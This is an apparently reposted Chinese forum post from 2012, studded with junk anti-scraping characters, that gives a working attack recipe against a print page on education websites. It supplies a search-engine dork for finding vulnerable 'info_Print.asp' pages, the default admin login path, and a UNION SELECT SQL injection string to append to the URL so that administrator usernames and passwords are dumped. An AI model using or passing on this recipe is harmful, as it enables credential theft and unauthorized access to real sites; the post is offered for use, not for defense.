教育站打印页面漏洞$ H2 p4 ^% I4 _7 h7 Z
百度或google搜索 inurl:info_Print.asp?ArticleID=
; N" ~$ z6 D% T6 o1 A. P% n6 E默认后台:/ad_login.asp. @: a* P; p5 Y; O+ S+ m
爆管理员密码:
* M3 U# v. q/ m在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
* [4 Z: `( M4 N7 u
3 @1 f+ N2 r# s8 `' ]# c+ zunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
' J- K; Q2 C$ }, s7 f% T9 \) \' b+ `8 b6 ]
作者:佚名 $ v' E1 p9 k( B0 l9 i' q% n
0 c+ @& M3 z: }' Y# P5 j/ E
3 o5 C/ ]. ]4 |( y0 i |
发表于 2012-10-31 08:37:31
收藏
支持
反对